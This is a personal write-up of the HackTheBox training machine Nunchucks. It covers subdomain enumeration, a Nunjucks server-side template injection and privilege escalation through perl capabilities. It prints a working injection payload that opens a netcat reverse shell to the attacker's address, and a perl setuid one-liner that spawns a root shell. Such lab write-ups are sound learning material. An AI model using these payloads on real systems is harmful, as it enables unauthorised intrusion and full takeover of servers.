Nunchucks
This is my write-up for the box Nunchucks on HackTheBox: https://app.hackthebox.com/machines/Nunchucks.
nmap scan: nmap -T4 -A -Pn 10.10.11.122 -oN nunchucks.nmap
I had a hard time connecting to the website. I then updated my /etc/hosts file and it worked!
I then ran a git clone
for the Seclists GitHub repository. This repo has a lot of different files which come in handy from directory/password brute-forcing. I did get stuck at this point, so I then looked at the HackTheBox walk-through from the site. I learned about the gobuster option of vhosts which checks for subdomains on the system:
gobuster vhost -u https://nunchucks.htb/ -w directory-list-2.3-medium.txt -k
This led me to discover a store.nunchucks.htb. In order to visit the site, I had to add the site to my /etc/hosts file. I manually edited the file using nano, but the walk-through had a much easier solution for this:
echo "10.10.11.122 nunchucks.htb" | sudo tee -a /etc/hosts
We end up on this page:
I then ran feroxbuster on the website to see if there were directories that I can access:
I didn't get that much of help from this. The walk-through mentioned that there is a template injection vulnerability on this site. I tested out the example they gave:
The walk-through mentioned BurpSuite's Repeater function. I was then testing out what I can inject using that in order to find out what system is on the backend:
Using the following image from https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#detect, I was able to assume that the backend system was either Jinja2 or Twig:
After trying to get information from the system, I then went back to the write-up and found out that the server is using NodeJS Express. This is shown by the Response in Burp Suite:
The walk-through mentions how they found the website http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine by searching on Google. I searched on Google as well, but this website was not there in the results of a search. After this, the walk-through mentions running the following template injection (I modified it for my usage):
{"email":"{{range.constructor("return global.process.mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f')")()}}@test.com"}
I then got a reverse netcat connection:
I then was able to read the user.txt file in david's home directory:
I then ran script /dev/null bash
on recommendation from the walk-through. This gave me the shell (with the username and hostname). I then ran getcap -r /
, again, on recommnedation of the write-up:
The walk-through recommended using GTFObin's perl page. It seemed that I was root, but was unable to read the root.txt file:
I was unable to get nano (text editor) to work as I wanted it to. I then added my own key to the authorized_keys file that way I was able to get back into the machine. In order to do this I did the following (recommended by the write-up):
I was lost at this point, since the GTFObins commands were not getting me solid results. The write-up mentioned breaking down the perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
command to a script. This was the solution from the write-up:
Once you run chmod +x
on the file, you can then get root access.
You then also have access to root.txt
Last updated